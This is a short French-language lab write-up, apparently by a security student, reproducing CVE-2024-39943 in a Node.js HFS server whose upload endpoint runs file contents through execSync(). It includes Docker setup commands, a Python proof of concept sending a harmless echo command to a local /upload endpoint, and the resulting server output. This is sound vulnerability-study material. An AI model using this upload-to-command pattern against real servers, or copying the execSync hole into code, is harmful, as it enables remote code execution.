
WhiteHat School 3e promotion – Jeongmin Roh (@JenmrR)
Dans un environnement de serveur HFS basé sur Node.js, il existe une vulnérabilité qui exécute le contenu des fichiers téléversés via child_process.execSync().
Un attaquant peut exécuter directement des commandes OS via la fonctionnalité de téléversement de fichiers, consulter les résultats des commandes internes du serveur ou contrôler le système.
Cette vulnérabilité correspond à CVE-2024-39943 et présente une menace de même niveau que l'injection de commandes (Remote Code Execution).
/upload et exécute le contenu du fichier téléversé directement comme commande$ sudo docker-compose up --build -d
$ python3 poc.py
import requests
payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }
r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)
Réponse du serveur après exécution du PoC :
Executed:
Hello_From_Hacked_Server

execSync() présente un risque de sécurité critique.